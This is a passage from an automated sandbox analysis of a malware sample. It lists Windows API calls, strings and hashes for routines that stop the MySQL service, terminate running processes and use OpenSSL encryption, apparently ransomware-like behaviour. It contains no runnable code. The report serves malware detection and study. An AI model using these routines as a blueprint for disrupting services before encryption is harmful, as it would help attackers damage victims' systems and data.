                                                                                                  • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00481A32
                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 00481A46
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00481A5B
                                                                                                  • Sleep.KERNEL32(?), ref: 00481A75
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00481A80
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00481A9E
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00481AA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                  • String ID: MYSQL
                                                                                                  • API String ID: 2359367111-1651825290
                                                                                                  • Opcode ID: e94da08b1c630c0a14e93702cbaf834bf2433bf392f4816af06335e0fea55eb6
                                                                                                  • Instruction ID: d7eae6616d54d6a71ce87b4441abf7552b9a2c23790bfbb4cca7e72f7610aea4
                                                                                                  • Opcode Fuzzy Hash: e94da08b1c630c0a14e93702cbaf834bf2433bf392f4816af06335e0fea55eb6
                                                                                                  • Instruction Fuzzy Hash: 9E11A332A01215EBDB25ABD4DD8CFAF7BACDB45751F040413FA01E2350DB28D98ADBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004D54C8
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004D54D4
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004D54F7
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004D5503
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 004D5531
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 004D555B
                                                                                                  • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004D55F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                  • API String ID: 1717984340-2085858615
                                                                                                  • Opcode ID: 3f15106eb9a6a915d75ef0f9fdbd1466bf11dece873121f527ce08071c2c221d
                                                                                                  • Instruction ID: 5425ac92182ef63b95cd596ff9c936cb174850ed38cdfc833ff9e604b7e6d423
                                                                                                  • Opcode Fuzzy Hash: 3f15106eb9a6a915d75ef0f9fdbd1466bf11dece873121f527ce08071c2c221d
                                                                                                  • Instruction Fuzzy Hash: 41517D35A40604BBEF216B659C23FBF7B69AF15715F00002BFD01BB3C1DA694905C7AA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0048244F
                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00482469
                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004824A1
                                                                                                  • TerminateProcess.KERNEL32(00000000,00000009), ref: 004824B0
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004824B7
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004824C1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004824CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                  • String ID: cmd.exe
                                                                                                  • API String ID: 2696918072-723907552
                                                                                                  • Opcode ID: fc7608310dc95867cd50f4815a8cfe24012ed203b993991a2a373fc1312ee658
                                                                                                  • Instruction ID: 8370eb462a55c074489008210c8bf6d0eb79ee79c226003cd31ed175aafb09f0
                                                                                                  • Opcode Fuzzy Hash: fc7608310dc95867cd50f4815a8cfe24012ed203b993991a2a373fc1312ee658
                                                                                                  • Instruction Fuzzy Hash: 5901B5365012157BE7206BA0AC8DFAF7B6CEB08B14F000061FD08E2241E7B88944ABB5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                  • API String ID: 1783060780-3771355929
                                                                                                  • Opcode ID: a8b4d9a303b792f42e9ddd010b591eea154393338b129be2f35ebcd298ff8b5d
                                                                                                  • Instruction ID: eef8b26a6830d0c7167a4563f1bc349e6741503f59c5e7f3706f5db2b486f82f
                                                                                                  • Opcode Fuzzy Hash: a8b4d9a303b792f42e9ddd010b591eea154393338b129be2f35ebcd298ff8b5d
                                                                                                  • Instruction Fuzzy Hash: CFA172B1C00249EBEF10EF95C946BDEBF75AF10318F14442DE40577292E7BA5A48CBA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                  • API String ID: 909875538-2908105608
                                                                                                  • Opcode ID: e8a6d70331957ccdbda6c51bb46ac451fa3016ead4ff33fa01a90c968f1db29b
                                                                                                  • Instruction ID: 2136ccd47af4cd601f71078ad8ee90eb49b1a959671c412679a95323317ac571
                                                                                                  • Opcode Fuzzy Hash: e8a6d70331957ccdbda6c51bb46ac451fa3016ead4ff33fa01a90c968f1db29b
                                                                                                  • Instruction Fuzzy Hash: 15416E65B8834129F7312929BC23F876B845F51B17F08046BFA88E53C3E78CC547826E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __init_pointers.LIBCMT ref: 00495141
                                                                                                    • Part of subcall function 00497D6C: EncodePointer.KERNEL32(00000000,?,00495146,00493FFE,00577990,00000014), ref: 00497D6F
                                                                                                    • Part of subcall function 00497D6C: __initp_misc_winsig.LIBCMT ref: 00497D8A
                                                                                                    • Part of subcall function 00497D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004A26B3
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004A26C7
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004A26DA
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004A26ED
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004A2700
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004A2713
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004A2726
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004A2739
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004A274C
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004A275F
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004A2772
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004A2785
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004A2798
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004A27AB
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004A27BE
                                                                                                    • Part of subcall function 00497D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004A27D1
                                                                                                  • __mtinitlocks.LIBCMT ref: 00495146
                                                                                                  • __mtterm.LIBCMT ref: 0049514F
                                                                                                    • Part of subcall function 004951B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00495154,00493FFE,00577990,00000014), ref: 00498B62
                                                                                                    • Part of subcall function 004951B7: _free.LIBCMT ref: 00498B69
                                                                                                    • Part of subcall function 004951B7: DeleteCriticalSection.KERNEL32(0057AC00,?,?,00495154,00493FFE,00577990,00000014), ref: 00498B8B
                                                                                                  • __calloc_crt.LIBCMT ref: 00495174
                                                                                                  • __initptd.LIBCMT ref: 00495196
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0049519D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3567560977-0
                                                                                                  • Opcode ID: 35798a5e5f42a27dfde6540e4b2367e7ced6d34d312f81c046a2b09e3e468c0e
                                                                                                  • Instruction ID: 5c65eb308f1a0743318278601e83aefcf7454e18c5a0504d699ec120c4f7c926
                                                                                                  • Opcode Fuzzy Hash: 35798a5e5f42a27dfde6540e4b2367e7ced6d34d312f81c046a2b09e3e468c0e
                                                                                                  • Instruction Fuzzy Hash: 4FF0C232949A111EEE267AB97C03B4B2E80AB11738B30073FF064D42D5EF1984415259
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0049594A
                                                                                                    • Part of subcall function 00498AF7: __mtinitlocknum.LIBCMT ref: 00498B09
                                                                                                    • Part of subcall function 00498AF7: __amsg_exit.LIBCMT ref: 00498B15
                                                                                                    • Part of subcall function 00498AF7: EnterCriticalSection.KERNEL32(00000000,?,004950D7,0000000D), ref: 00498B22
                                                                                                  • _free.LIBCMT ref: 00495970
                                                                                                    • Part of subcall function 00490BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0049507F,00000000,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490C01
                                                                                                    • Part of subcall function 00490BED: GetLastError.KERNEL32(00000000,?,0049507F,00000000,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490C13
                                                                                                  • __lock.LIBCMT ref: 00495989
                                                                                                  • ___removelocaleref.LIBCMT ref: 00495998
                                                                                                  • ___freetlocinfo.LIBCMT ref: 004959B1
                                                                                                  • _free.LIBCMT ref: 004959C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID:
                                                                                                  • API String ID: 626533743-0
                                                                                                  • Opcode ID: 27907389452f787d3a7e593951b0d20cc29a6730cb383785a46313037da17430
                                                                                                  • Instruction ID: f249f46c6f42273752909aa8e08ed9646a80991c309b3aefce8110f973143812
                                                                                                  • Opcode Fuzzy Hash: 27907389452f787d3a7e593951b0d20cc29a6730cb383785a46313037da17430
                                                                                                  • Instruction Fuzzy Hash: DE018EB1102B00EAEE366B69E446B1E7EA06F40739F30423FF069961D5CF7C99809B5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: $+$0123456789ABCDEF$UlL
                                                                                                  • API String ID: 1302938615-2298492726
                                                                                                  • Opcode ID: 21521612c7b475f73262eaa2de71b8ee80880b04aa6670ba3ea09417960a1d4f
                                                                                                  • Instruction ID: 9f9202a1754f5e86394f19dd2f5a49f7d043a907823e39054228d3cbee8b654c
                                                                                                  • Opcode Fuzzy Hash: 21521612c7b475f73262eaa2de71b8ee80880b04aa6670ba3ea09417960a1d4f
                                                                                                  • Instruction Fuzzy Hash: 06817BB5A087509FD750CE298840B2BBBE5BFC8758F15091EF98997312D338DD058F96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 004C07C3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                  • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                  • API String ID: 601868998-2416195885
                                                                                                  • Opcode ID: bf50d8a5f1195a4a5dc8bd8186a53987f6397e84efb3f3001f45d8db516dc098
                                                                                                  • Instruction ID: cf6dc89fcface54a1f4955e5a0efa4881a78617cf9d11e31e1c2e40530943f1a
                                                                                                  • Opcode Fuzzy Hash: bf50d8a5f1195a4a5dc8bd8186a53987f6397e84efb3f3001f45d8db516dc098
                                                                                                  • Instruction Fuzzy Hash: D141E479A053059BDB24EE15CC45FAFB7D8AF85308F00082FF58593242E678E9088BA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$g9M
                                                                                                  • API String ID: 2102423945-1309922662
                                                                                                  • Opcode ID: bf4bd81a593df3420a4a0975a646d960b0bae87ba2fe15f42d4ee39586a6c9ed
                                                                                                  • Instruction ID: ef5e751dfd5fd7ce42bed1f925f3e81e40849916fb665dfb7638c11f06ce11df
                                                                                                  • Opcode Fuzzy Hash: bf4bd81a593df3420a4a0975a646d960b0bae87ba2fe15f42d4ee39586a6c9ed
                                                                                                  • Instruction Fuzzy Hash: 5621E4BAB403217BE610665DFC52F56B799EB94B18F00413FF609D72C2D2A4E821C7D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 00535D3D
                                                                                                    • Part of subcall function 0049501F: GetLastError.KERNEL32(00000001,00000000,0049520D,00490CE9,?,?,004A0E81,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00495021
                                                                                                    • Part of subcall function 0049501F: __calloc_crt.LIBCMT ref: 00495042
                                                                                                    • Part of subcall function 0049501F: __initptd.LIBCMT ref: 00495064
                                                                                                    • Part of subcall function 0049501F: GetCurrentThreadId.KERNEL32 ref: 0049506B
                                                                                                    • Part of subcall function 0049501F: SetLastError.KERNEL32(00000000,004A0E81,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00495083
                                                                                                  • __calloc_crt.LIBCMT ref: 00535D60
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 00535D7E
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 00535DCD
                                                                                                  Strings
                                                                                                  • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00535D48, 00535D6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                  • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                  • API String ID: 3123740607-798102604
